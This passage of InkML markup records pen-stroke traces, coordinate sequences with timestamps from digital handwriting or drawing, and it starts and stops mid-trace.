17,-26-1-32,52 14 31,-26-13-15,13 0-1,27 13 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="50706.43">8030 8295 0,'0'13'93,"0"80"-77,0-67 0,0 27-1,13-13 1,1-14-1,-14 0 1,13 14 0,-13-13-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="51578.83">8070 8348 0,'0'-14'78,"0"-12"-62,39 13 0,41 13-1,-67-14-15,40 14 16,-27 0 0,-26 27 62,-13-14-47,-13 0-15,-1 14-1,1-27 1,-14 0-1,27 13 1,-27-13 0,1 0-1,25 0 1,1 13 0,0-13 46,13 14-46</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="52220.47">8453 8295 0,'0'0'0,"-26"0"63,-40 53-48,26-27 1,40 14-1,0-14 1,0 1 15,0-14-31,13 0 78,27-13-62,-27 0-16,27 0 16,-27 0-16,27-13 15,-27 0 1,0-14 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="53081.71">8559 8348 0,'13'-27'31,"54"-118"-16,25 39 17,-79 66-32,1 14 31,12 26-15,-13 0 15,1 0-16,-1 0 1,0 26 0,-13 40-1,0 0 1,0-13 0,0 13-1,-53 1 1,0-14-1,14 13 1,39-40 0,0-13-1,0 1 48,224-1-16,-65-13-32,-119 0-15,66 0 16,0 0 0,-40 0-1,-40 0 1,-13 0-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="59773.54">16960 4471 0,'13'0'16,"0"14"62,0-14-63,1 13 1,-14 0 0,39 27-1,41 0 1,-14-27 0,13 13-1,-13-13 1,27-13-1,13 27 1,158 13 0,-250-40-1,65 0-15,27 26 32,-93-13-32,14-13 15,-1 0 1,40 0-1,27 0 1,-1 0 0,-39 0-1,93 27 95,-1 39-79,-79-66-15,1 13-1,-41 14 1,53-27-1,14 0 1,-14 0 0,-26 0-1,0 0 1,-26 0-16,26 0 16,66-14-1,-27-12 1,-52 13-1,-27 13 1,0-14 78,-13 1-79,0-27 1,0-79 0,0 106-16,0-13 15,0-40 1,0 13 0,0-13-1,0 13 1,14-14-1,-14 54 1,13-13-16,0 13 0,0-14 0,54-65 16,-28 52-1,-26 27 17,14-14-17,-1 14 1,-26 39 124,27 212-124,-14-92 0,-13-80 15,0-53-31,0 1 16,0-1-1,40-79 48,185-40-48,-146 66-15,119 0 16,54 14 0,-14 26-1,-172 0 1,-53 0-1,1 0 1,-1 79 0,-79 212-1,-80-26 17,53-159-17,1-66 1,65-27-1,27-26 48,199-1-47,-146 14-16,172 0 15,-146 0-15,133 80 16,-54 12-1,-52 27 1,-92 0 0,-1 14-1,-40 12 17,-12-105-32,-133 132 15,0-53 1,53-66-1,119-40 1,39 40 47,266 79-48,39 67 1,-40 39-1,-119 13 1,-119-39 0,-66-93-1,-53-13 17,-92 0-17,-80-40 1,172-53-16,-106 13 15,106-12 1,66 12 78,120 93-79,-120-92-15,80 145 16,-41-67 0,-38-65 15,-67 13 0,-119 13-15,26-53-1,27 14 1,-40-27 0,-39-27-1,145 1 1,40 13 31,0 0 15,-225 13-46,145 0 0,-291-27-1,318 14-15,-225-53 16,-40-40-1,252 66-15,-66-26 16,65 26 0,54 27-1,-1-27 17,-26-92-17,14 26 1,-14 53-1,0 0 1,-27 14 0,-92-14-1,-39-27 17,171 54-32,-53-14 15,80 14 32,13-80-31,0 53-16,0-39 15,0 52 1,0-13 46,-39-119-46,25 53 0,14 79 15,0-13-15,0-66-1,0-159 1,66 120-1,-26 65 1,0 67 0,-40-1 15,26-13-15,-12 14-16,25-27 15,-39 27-15,53-54 16,0 14-1,-13-13 1,13 26 0,39-40-1,1 27 17,-53 53-17,-27 0 1,26-14-1,1 1 1,-40 12-16,27 1 16,26-40-1,-27 27 63,27-1-62,0 1 0,-13-14 46,-14 1-46,-13 39-16,14-27 15,26-13 1,-40 40 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="60565.09">19354 6072 0,'0'146'94,"0"12"-78,0-91-16,0 65 15,0-79-15,0 92 16,27-26 0,-27-79-1,0-13 1,0 25-1,0 1 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="61331.12">19645 6919 0,'14'0'16,"-14"-40"31,0-79-32,39-198 1,27 118-1,-39 107 1,-1 25 0,-26 54-16,14-13 15,12 12 1,0-12 0,-12 26 46,-1 0-46,-13 13 31,13 80-32,-13-67-15,0 133 16,0 0-1,0-106-15,0 92 16,0-39 0,0-53-1,0-27 1,0-12-16,0 12 16,0 1-1,-13-14-15,13 0 16,0 0-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="62523.42">19513 6085 0,'13'93'110,"14"-14"-95,-14 1 1,-13-1 0,0-52-16,0-14 0,0 40 15,0-40-15,0 27 16,0-14 0,0 1-1,0-1 1,0 14-1,0 39 17,13-52-32,0-14 31,-13 0 94,0 0-78,14-13 0,-14 40 46,0 0-77,0 13 0,0-14-1,0-26-15,0 1 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="63314.48">21762 4485 0,'-13'0'15,"13"39"1,39 252 0,1-66-1,-13-26 1,-1-14 0,-26-53-1,0-79 1,0-40-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="64100.86">21802 4564 0,'0'0'0,"79"-40"16,-26 1 0,-27 25-1,1 1 1,-1 0-1,-12 13 17,-1 40 15,13 52-32,-26-78-15,27 38 16,-14 15-1,-13-1 1,0 53 0,-79 79-1,12-92 1,28-66 0,39-14-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="65131.48">22397 4247 0,'0'39'63,"0"173"-48,0-172-15,0 105 16,0 14-1,13-14 1,-13-78 0,13-41 15,-13-13 16,14-13-16,52-119-15,-53 79-16,40-26 15,-13-26 1,-27-14 0,-13 27-1,0-27 1,0 40-1,0 39-15,0-13 16,0 27-16,0-40 16,0 0 15,0 14-15,0 25 15,40 81 63,-14 52-79,-26-80-15,40 94 16,-14-14-1,-13 13 1,14-13 15,-27-79 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="66164.14">22820 3903 0,'14'0'16,"-1"13"31,26 212-32,1-14 1,-27-39 0,40-39 15,-39-28-15,12-38 15,-26-28-16,13-25 1,80-94 47,-27 1-48,-26 26 1,-40 26-1,0 1-15,0 0 16,0-14 0,0 13 15,0 1-15,0 13-16,0-1 15,0 1 48,-40 26-48,-26 27 1,26-13 0,14-14-1,12 0 1,1-13 109,13 13-110</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="68564.42">1733 3188 0,'93'146'110,"-40"-54"-95,132 160 1,-66-54 0,-27-26-1,-52-106 1,-40-52 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="69469.87">1759 3387 0,'0'0'0,"14"0"16,-1-14-1,27-12 1,-1-14 0,67-26-1,-13-40 1,13 14 0,-80 65-16,53 1 15,146-40 1,-172 52-1,-40 14 1,1 40 47,-14 53-48,0 79 1,-53 26-1,13-132 1,0-39 0,40-14-16,-13-13 15,-13 13 1,-1 0 0,-12 1-1,12-1-15,-39 0 16,13 0-1,27-13-15,-1 0 16,27 14 0,-13-14 62,0 13-63,-1-13 17,-12 0-17,13 13 1,0-13 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="70304.09">2924 2871 0,'0'13'79,"13"132"-64,-13-12 1,26 39-1,-12-133-15,38 94 16,1-54 0,-26-52-1,-27-54 142,40-66-142,-1-78 1,1 12-1,-40 132-15,13-105 16,0-40 0,-13 53-1,0 79 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="70644.35">3426 2686 0,'119'158'47,"-39"-12"-31,-54-93-16,27 39 16,13 80-1,-66-132 1,0-27-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="71015.03">3228 2156 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="71564.59">3625 2355 0,'53'0'31,"39"66"-15,67 159-1,-40 79 1,27-53-1,-80-145 1,-53-92 0,-13-41 46,0-330-46,0 225-16,0-331 15,0 330-15,0-211 16,0 252 0,0 65-1,0 1-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="72764.31">4934 2130 0,'0'0'31,"14"53"-31,-14-27 16,13 14 93,53 39-93,-39-52-16,65 118 15,-39-39 1,-53-40-1,27-52 1,-41-14 93,-12-40-93,-1-132 0,27 66-1,0 80 1,0 12 78,0-12-79,14-1 48,12 14-48,14 40 48,-14 65-47,14 14-1,-14 0 1,-26-53-1,0-27 1,0 1 0,-26-14 15,-1-13-15,27 13-1,-13-13 32,0 0-31,13-13 15,0-53-15,0 53-16,0-80 15,0-53 1,0 120-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="73281.89">5292 2355 0,'0'0'0,"0"-13"16,0 118 93,0-38-93,0-41-16,13 0 16,13 14-1,-12-27 188,-1-13-203</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="73752.5">5464 1733 0,'0'198'47,"0"-78"-31,26-81-16,67 107 15,39 26 1,-92-119 0,-27-40-1,0 27 1,-13-14 0,0-13-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="74096">5874 2408 0,'0'-14'16,"-27"14"46,-52 0-46,52 0 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="75001.23">6085 1984 0,'0'14'62,"0"-1"-30,27 0-17,39-13 1,0-40 0,-53 1-1,-13 25 1,0 1-16,0 0 31,-13 0-15,-106 66 15,106-14-31,-40 41 16,26 12-1,27-26 1,0-52-16,0-1 0,0 0 15,0 0 1,0 1 0,14-14-1,-1 0 1,0 13 0,0 0-1,40-13 1,0 0-1,-13 0 1,-27-13 47,0 0-48,1-1 32,12-12-31,-26 13-1,13 13 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="76584.37">7805 2566 0,'-39'0'32,"-41"14"-17,67-14 1,-14 26 0,14-13-16,-40 27 15,-251 92 1,211-118-16,-198 118 15,-158 27 1,158-80 0,13 14-1,13-27 17,27 0-17,198-53-15,-185 53 16,-66 14-1,238-54-15,-105 14 16,-94 26 0,54-26-1,-14 26 1,159-53-16,-52 27 16,-54 26-1,119-53-15,14-13 0,-27 27 16,0-1-1,26 0 1,-12-26 0,-1 27-1,-13-1 17,40-26-32,0 14 15,-1-1 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="84110.93">20757 8321 0,'0'40'109,"0"26"-93,0 0 0,-14 27-1,14-54 1,0-12 46,0 92-46,0-40 15,-13 1 1,13-67-32,0 0 15,0 27 1,0-14-16,0 27 15,0 40 1,-26 79 0,12 13-1,1-159-15,0 80 16,0 66 0,13-92-1,0-1 1,0-39-1,0-1 1,0-25-16,-27-1 16,14 53-1,0 0 17,0 14-17,13-54-15,-27 14 16,1 13-1,12-27-15,-38 14 16,-41-1 0,-119 28-1,-79 25 1,13-52 0,106-14-1,133-26-15,-120 27 16,0 12-1,14-12 1,-1 13 0,-26-14-1,0 14 17,119-27-32,14-13 0,-28 0 15,-78 0 1,105 0-16,-39 0 15,-14 13 1,1 0 0,-1 1-1,80-14-15,-80 13 16,40 0 0,-39 0-1,12-13 1,-78 0-1,-186 0 1,304 0-16,-53 0 16,-26 0-1,0 0 17,-13 0-17,105 0-15,-12 14 16,-14-14-1,13 13 1,27-13 15,-14 0-15,-25 26 0,25-26-1,-13-53 63,14-39-62,-40-173 15,26 106-15,14 54-1,12 25 1,14-12 0,-26 25-1,26 54-15,0-26 16,0 25 0,-13-12-1,0 26 1,-1 0 46,-92 0-46,93 0 0,-291 0-1,0-53 1,92 26-1,133 14-15,-107 13 16,-65 0 0,79 0-1,66-26 1,93 26-16,-13 0 16,12 0-1,14 39 110,14 94-109,39 65-1,-1 14 1,-38-159-16,25 66 16,-25 13-1,-14-119-15,0 80 16,0-14 0,0 1-1,0-27 1,0 13-1,-14-13 1,14-27-16,-13 27 16,13 13-1,-13-13 17,13-40-17,0 1 1,0 12 31,0 14-32,66 26 1,-13-26 0,53-1-1,-14-26 1,-39 1-1,-13-1 1,26-13 0,40 0 15,-93 0-31,80 0 0,145 0 31,-132 0-15,26 0-1,-53 0 1,-26 0 0,-39 0-16,25 0 15,67 0 1,-27 0 0,27 0-1,-26 0 1,12 0-1,-65 0-15,-1 0 16,-13 0-16,1 0 0,-1 0 78,0 0-62,0-13-16,1 13 0,-14-27 15,13 14-15,-13-13 16,0-54 0,0 67-16,0-66 15,-27-199 1,-52 119 0,66 119-16,0 1 15,-14 25 16,1-12-15,26 0 0,-14 12 46,1 14 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="84629.27">14354 10358 0,'0'80'63,"0"158"-48,13-185-15,106 145 16,-53-79 0,-53-79-1,1-27 17,-14 0-17,0 1 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="85364.09">14526 10716 0,'0'-27'31,"0"1"-15,13 26-16,27-27 16,-1 1-1,-26 13-15,40-14 16,-13 14-1,-13 53 79,-27-1-78,0-26-16,0 27 15,0 26 1,0-39 0,0 26-1,-14-27-15,-25-13 16,12 14 0,14-27-1,-14 13 1,14-13-1,-26 0 17,25 0-32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="85931.09">15240 10821 0,'0'0'0,"0"-13"31,-26 13-15,-14 27 0,-26 52-1,52-52-15,-25 25 16,39 15 0,0-28-1,0-12 1,0-14-1,0 0 1,0 0-16,66 1 16,185-14-1,-118 0 1,-81-14 15,-38 1-15,-14 0 78,-14 13-94</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="87111.88">15690 10544 0,'0'-14'63,"26"67"-47,-13-53-16,27 66 31,-27-52-16,-79 25 17,-79 1-17,79-13 1,66-14 0,0 0 46,0 13-46,13 1-1,0-1 17,-13 1-1,0-14-16,0 0 1,0 1 62,0 12-62,0-13-1,0 14 1,13-27 0,-26 0 62,-13 26-63,12-13 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="89844.67">19090 9723 0,'0'0'0,"-27"0"0,-12 0 0,-1 14 15,-185 144 1,212-131-16,-1 39 16,41 0-1,13-26 17,423 172-1,-291-160-16,-159-38 1,-13 12 62,-66 40-62,0-26-1,52-40 1,-12 13 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="90504.37">19698 8969 0,'13'-13'32,"14"66"-17,-1 0-15,27 159 16,0-40-1,13-53 1,-39-40 0,-1-52-1,-26-14 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="91616.67">19751 9062 0,'13'-53'78,"27"27"-63,0 12 1,-27 14 62,13 0-62,1 67-1,-27-1 1,0-53 0,0 27-16,0-1 0,0 54 15,0-67 17,0 14 14,-66 13 33,66-40-64,13 0 141,13 1-140,27-14 0,80 26-1,-94-13-15,41 40 16,-14 0 0,-53-26-1,0-27 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="96383.01">6165 6654 0,'0'-13'62,"-80"13"-46,-303 66-1,-80 0 1,-66-52 0,132-28-1,185-39 1,146 53-1,132 0 173,410 0-172,106 27-1,-251 26 1,-265-53-16,53 13 15,-92-13 1,-14 0 187,53 0-187,-39 0-1,-1 0 1,-13 0 0,-13-13 109</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="98617.31">5384 6760 0,'-13'27'125,"13"65"-109,0-79-16,13 120 31,0-54-15,-13 14-1,14-14 1,-14-26 0,39 26-1,-25 27 1,25-40 0,1 0-1,13 1 1,-27-14-1,14 39 1,13-13 0,53 93-1,-80-119 1,67 66-16,13 27 31,-53-106-15,-27-1-1,1-12 1,12 12 0,54 28-1,-1 25 1,-52-52-16,225 79 16,-146-13-1,-27-53 1,-39 0-1,-13-27 1,39 27 15,-65-40-31,210 120 16,-25-41 15,-80-39-15,-40 0-1,-65-53-15,12 13 16,-13 14 0,14-27 31,39 13-32,-53 0-15,66 14 16,305 131-1,-159-65 1,-27 0 15,-92-67 1,-79-26-17,-14 0-15,13 0 16,54 13-1,79 40 1,132 27 0,-159-1-1,-53-53 1,-65-12 0,-1-14-1,26 13 1,28 0-1,-41 0-15,53 14 16,27-1 0,-93-13-16,14 1 15,52-1-15,14 13 16,66 27 15,52 0-15,-25 0-1,-14-26 1,-120-14 0,-12-13-1,-27 0 17,67 0-17,-54 0-15,54 13 16,39 27-1,79-1 17,-13-39-32,-145 0 15,26 0 1,-53 0 15,1 0-15,-1 0 234,40 14-235,-40-14-15,53 13 16,0 0 0,0-13-1,-13 0 1,-26 0 0,-1 0-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="99987.1">12224 10663 0,'92'13'78,"1"-13"-62,0 13-1,-54-13 1,-26 0 0,1 27 140,-80 65-140,39-79-16,-39 40 15,53-53-15,-67 40 16,1 0-1,53-1 1,-27-12 0,39-27 171,14-93-171,14-13-1,39-26 17,-53 106-32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="105258.66">6443 4128 0,'-119'66'31,"238"-132"-31,-265 171 0,622-303 94,-171 79-79,224-133 1,40 1 0,-464 225-16,160-107 15,-14 41 1,-12-27 0,25 26-1,-198 67-15,119-67 16,106 0-1,-224 67 1,118-27-16,79-26 16,213 39 15,674 40 0,-106 0-15,-556 0-1,80 0 1,-53 0 0,-93 0-1,-52 0 1,79 0 0,-80 0-1,-79 0 1,-40 0-1,-184 0-15,131 0 16,-105 0-16,158 0 16,305 0-1,-120 26 17,-66 41-17,-250-54 1,-68 0-1,1 0 17,106 93-17,344 40 1,-291-80 0,-186-53-16,53 40 15,27-13 1,-79-27-16,118 79 15,1-12 1,-54-27 0,-78-53-1,-1 13 95,-13 0-32,39 53-63,-12-39 1,-27-14 31,13 27-16,0-40-31,-13 26 16,14 1-1,-1-14 1,-13 0 0,0 0-1,13-13 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="106895.37">20399 3717 0,'27'27'93,"65"52"-77,-65-66-16,26 40 31,-27-39-15,-13-1-1,1-13 48,-1 13-16,0-13-32,-13-13 79,40-93-78,26-106-1,13 27 1,-65 145 0,-14 27-1,-133 185 173,14-53-173,80-66-15,-160 106 16,40-66 0,159-80-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="127996.86">6350 4233 0,'0'-13'31,"0"26"-31,53-52 16,13-1-1,93-26 1,145 0 0,-105-14-1,-160 67-15,54-27 16,39-13 0,-13 14-1,66-1 1,40 14-1,27-14 1,-41 0 0,14 1-1,146-1 17,-120 0-17,-39 14 1,211-54-1,-357 80 1,-13-13-16,93 0 0,-14 0 16,93-27-1,-40 14 1,40-14 0,0-13-1,-14-13 1,-158 53-16,80-27 15,65 0 1,-66 14 0,-39 26-1,0-27 1,12-12 15,-78 39-31,13-14 0,52 1 16,80 0-1,27-14 1,12-12 0,-39 25-1,-53-12 1,-79 13-16,66 0 16,66 13-1,0 0 1,-27 0-1,14 0 1,26-14 0,-132 1-16,106 0 15,132 0 17,-53-27-32,-40 40 31,1 0-16,26 0 1,-146 0-16,199 53 16,-53 13-1,26 0 1,-52-13 0,-93-40-1,-14 14 1,-79-27-16,120 13 15,158 66 1,-119-26 0,-40-26-1,-53 12 1,-39-12 0,13-1 15,40 54-16,-1-27 1,-39 0 0,-13-27-1,-14-13 1,-13-13-16,54 0 16,-14 13-1,39 1 1,-39 12-1,-13-13 1,-27 1 0,0-14-1,-13 13-15,27-13 0,92 92 32,-13 14-17,105-13 1,-105-53-1,-80-27 1,-12-13 0,39 40 15,66 39-15,-66-39-1,0-14 1,-40-26-16,0 13 15,27 1 32,-27 12-31,66 27 15,-39-27-15,-14-12-1,-12 12 1,12 0 0,14 14-1,-1-13 1,-12-14 0,-14 0 15,-13 14-16,13-1 1,1-13 0,25 40 77,-25-53-77,-1 0-16,0 27 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="133410.84">23667 4723 0,'-53'92'62,"-132"54"-46,119-120-16,-172 80 15,-133 66 1,107-53 15,92-53-15,53-13-1,39-26 1,54-27-16,-40 13 16,-93 66-1,0 1 1,66-27 0,67-40-1,26 0 1,-13-13 62,-106-264-47,92 184-31,-39-79 16,-53-92-1,40 106 1,65 118 0,1 14-1,0-67 1,13-39 0,0 67-1,0 25 1,0-26-1,0-26 1,40-40 0,13 66 15,-40 26-31,0-12 0,0 12 0,0 14 16,1-13-1,-14-14 1,66-26-1,13-14 1,27 14 0,93 26-1,12-12 1,-184 52-16,39-27 16,93-13-1,13 14 1,66-1-1,-53-12 1,-66 39 0,-106 0-1,27 0 48,39 0-48,-52 0-15,52 0 16,-26 0 0,-40 0-1,40 13 17,40 40-17,-80-53-15,53 53 16,-13 0-1,0 26 1,26 14 0,1-1-1,-27-39 1,-27-13 0,-13-14 15,-13-12-31,0 39 15,0 79 1,0-26 0,0-53-1,0-40 1,0 13 0,-13 1-1,13-1 1,0-13-1,0 14 1,-13-27-16,0 13 16,-14 14-1,14-14 1,-14 13-16,1 1 31,-27 12 47,40-12-62,-14-1 0,1-26-1,13 27 1,-1-14 15,1-13-15,13 13-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="148284.79">6416 5741 0,'0'-13'62,"-79"-13"-46,-120-54-1,-26 41 1,93 25 0,66 14-1,0 0 1,0 0 0,-14 14-1,1-1 1,0 13-1,-14 27 1,40-13 0,-26 0-1,65-40-15,-25 26 16,-41-13 15,14 1-15,27 12-1,25-13 1,1 14 15,13 26-15,-13 52 0,-14-25-1,27-54-15,0 40 16,0 14-1,0-14 1,0 40 15,40-14-31,13 1 16,-27-67 0,27 41-1,0-28 1,-13-12-1,0-1 1,13-13 0,39 14-1,-12-27 1,39 0 0,-80 0-16,14 0 0,13 0 15,14-13-15,92-14 16,-80 14-1,-26 0 1,-26 0 0,13-1-1,-40 1 1,27-13-16,66-27 16,-40 13 15,-40 27-31,14 0 15,-27-1 1,1 1 0,25-27-1,1 1 1,-14-1 0,-12 0-1,-14 14 1,0 13-16,0-27 15,13-53 1,-13 27 0,0 40-1,0-1 48,0 1-48,0-27 1,0-13 0,0 39-1,0 1 110,-40-27-109,-26 27 0,40 12 15,-14 1-16,27 13 1,-1-13 15,-25 13 32,26 0-32,-27-13 266,13 13-281,14 0 15,-13-14 47,-14 1-62,-26 13-1,13 0 1,26 0-16,-12 0 15,-1-13 1,27 0 0,-14 13-1,-25-40 1,-15 40 15,54 0-31,-53-26 16,-40-1-1,27 27 1,13 0 0,52 0-16,-25 0 15,12-13 1,1 13 0,13 0-16,-40-13 15,-13 13 1,13 0-1,0 0 1,0 0 0,-27 13-1,67-13-15,0 13 16,-40 14-16,-53-1 31,27 0-15,26-12-1,40 12 1,-14-26 0,27 13-16,-26 14 15,13-1 1,-1 14 0,1-14-1,13-12-15,0 25 16,-13-25-16,13 25 15,0 27 1,0-13 0,0 13-1,0 1 1,0 12 0,0-26 15,26 26-16,1-26 1,-1 13 0,14-39-1,13 52 1,-27-52 0,1-1-1,-27-13 1,13-13-1,0 14-15,-13-1 16,13 0 0,27 0-1,-13 0-15,52 1 16,27-14 15,-93 0-31,40 0 16,40 0-1,-41 0 1,15 13 0,-41 0-16,0-13 0,67 0 15,92 0 1,-79 0 0,-13 0-1,-40-13 1,0 13-1,-40 0-15,26 0 16,14 0 0,14 0-1,25-40 1,14 1 15,26-41-15,-118 67-16,78-40 15,14 0 1,0-13 0,-53 26-1,-14 14 1,-25 13-16,-1-1 16,-13-25-1,13 25 1,0-25-1,-13 12 1,0-12 0,0 12-1,0-13 1,0 1 15,-26-41-15,-27 27-1,-13 14 1,26 12 0,-26-12-1,26-1 1,-13 14 0,40 26-1,-13-14 1,26 1-16,-27 13 15,1-13 1,-1 13 0,-26 0-1,-13 0 1,0 0 15,53 0-31,-14 0 16,-12 0-1,-14 0 1,-40 0 0,27 0-1,-27 0 1,80 0-16,-13 0 16,-1 0-1,14 0 1,0 0-1,-14-13 1,-12 13 0,25 0-16,-25 0 15,-14 0 1,26 0 0,-12-14 15,12 14-16,1 0 17,-27-13-17,0 13 1,0 0 0,0 0-1,0 0 1,27 0-1,-14 0 1,14 0 0,-27 0-1,0 0 1,-27 0 15,27 13-15,-13 27-1,13-13 1,14-1 0,39-13-1,-27 14 1,14 12 0,13 14-1,0 0 1,-13 13-1,13 0 1,0 1 0,0-54-16,0 40 15,0 66 1,0-66 15,0-27-15,39-26 62,1 27-62,-27-14-1,1 0 1,-1 0 31,106 40-32,-26-26 1,-1 12 0,-65-39-1,12 0-15,-12 0 16,12 14-1,-25-14-15,12 0 16,14 0 0,26 0-1,40 0 1,-40 0 0,13 0-1,-26 0 1,13 0-1,-26 0 1,39 0 0,-12-14-1,52-12 1,-66 26 15,13-13-15,-66-1-16,26 1 15,1 13 1,-14 0-16,27-13 16,39-13-1,-26-1 1,0 14 0,-27 0-1,-13-1 1,14 1-1,13-26 1,-1-28 0,1 41-1,-27-27 1,-13 0 0,0 40-1,0-53 1,0 26-1,0 14 1,0-14 0,0 27-1,0-1-15,0-12 16,-53-27 0,40 53-16,-27-40 15,1 14 1,-14-1-1,40 1 1,-14 13 0,1 0-1,12 13-15,14-14 16,-26 14 0,-27 0-1,-26 0 1,39-13-1,13 13-15,-12-13 16,-27 0 0,52 13-16,-25-14 15,12 1 1,-12 0 0,12 13-1,-13 0 1,-12 0-1,38 0 1,-39 0-16,-26 0 16,0 0-1,-1 0 1,41 0 15,25 0-15,1 0-16,-13 0 15,-1 0 1,-39 0 0,26 0-1,-13 0 1,40 0 0,0 0-16,0 0 15,0 0 1,-14 0-1,-26 0 1,13 0 0,1 0-1,12 0-15,1 0 16,-14 0 15,14 0-15,12 0-1,-25 0 1,-14 53 0,40-53-16,13 40 15,-27 12 1,27 1 0,0-13-1,0-27-15,0 27 16,0-27-16,0 14 15,0 12 1,0-25 0,0 12-1,0 0 1,13 41 15,-13-54-31,14 27 16,12 39-1,-26-26 1,13-13 0,-13-27-1,14 26 17,12 1-17,-13 0 1,14-14-1,-14 1 1,0-14 0,-13 0-1,27 14 17,-14-14-32,40 13 31,0 1-16,-14-14 1,-25-13-16,12 13 16,14-13 15,-1 0-15,-12 0-16,-1 0 0,27 13 15,40-13 1,13 0-1,-80 0-15,106 0 16,-79-13 0,-13 0-1,13 13 1,-40-13 0,27 0-16,0-14 31,65-26-16,-78 27 1,-14 26-16,0 0 0,1-14 16,12 1-1,14 0 1,-14 0 0,1-14-1,-1 27 1,14-39-1,-27 39-15,-13-27 16,26 1 0,-26-1-1,0-26 1,0 27 0,27-40 15,-27 53-31,0-67 15,13 27 1,-13 27-16,13-14 16,-13-13-1,0 13 1,14 1 0,-14 12-1,0 14 16,0 0-15,0 0 15,-14-27-15,-25 14 0,-14-1 15,40 27-31,-1 0 0,-12-13 15,-27 0 1,40 13-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="151805.93">9141 7951 0,'14'0'16,"-67"0"62,0 0-62,-132 0-1,-14 0 1,-26 0 0,14 0-1,65 26 1,40-26 0,66 13-1,14 1 1,-27-14-1,-26 13 1,-14 40 0,67-53-1,12 0-15,-12 13 47,26 0-31,-53 27-1,13 13 1,27-40-16,-13 14 16,12 25-1,1-38 1,0 25 0,13 28-1,0 12 1,0-66-16,0 40 15,13 26 1,40-52 0,0 13-1,26 39 1,-12-39 0,-54-14-1,53 14 1,66-1-1,120-12 1,52 26 0,-106-27-1,-52 1 1,-106-27-16,-1 0 0,27 0 16,159 0-1,-40-53 1,1-13-1,-14 39 1,-53-26 0,-93 53-16,1-13 15,12-13-15,54-41 16,-27 28 15,-53-14-15,27 13-1,-14 0 1,-26 27-16,27-26 16,-27-41-1,0-12 1,-13-54 0,13 133-1,-14-14 1,1 14-16,0 0 15,-27-14 1,-26 14 0,0-13-1,40 26 1,-54-27-16,-12 1 16,65 13-1,-39-1 1,40 1-16,-54 0 15,54 0 1,-14-1 0,14 14-1,-14 0 1,-53 0 0,80 0-16,-212 0 15,119 14 1,40 12-1,53-26 1,-40 27 62,-40 12-47,40-12-15,27-27 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="203853.77">7937 2606 0,'-39'27'0,"78"-54"0,-197 120 16,131-80-16,-65 27 15,-14-1 1,79-25-16,-39-1 16,-53 13-1,-13 14 1,13 0-1,92-27-15,-78 27 16,-15 12 0,28-38-1,12 12 1,1-26 15,26 0-15,27 0-16,-14 27 15,-66-14 1,-79 40 0,-106 0-1,40-27 1,65 1 0,147-1-16,-54 1 15,-145 52 1,132-66-1,-53 40 1,27-13 0,13-14-1,-40 27 1,1 0 0,-54 26 15,27-26-16,-53 27 1,13-1 0,198-66-16,-26 1 15,-92 25 1,92-26 0,0 1-1,0 25 1,-40 1-1,67-13-15,-80 25 16,0-12 0,14-27-1,52-13 1,14 0 0,-14 27 15,13-14-16,-52 0 1,26-13 0,-26 0-1,26 0 1,-13 0 0,52 0-16,1 0 0,-26 0 15,12 0-15,-105 0 16,52-13-1,14-40 1,27-13 0,-28-40-1,28 0 1,25 80-16,-25-120 16,-14-12-1,40 38 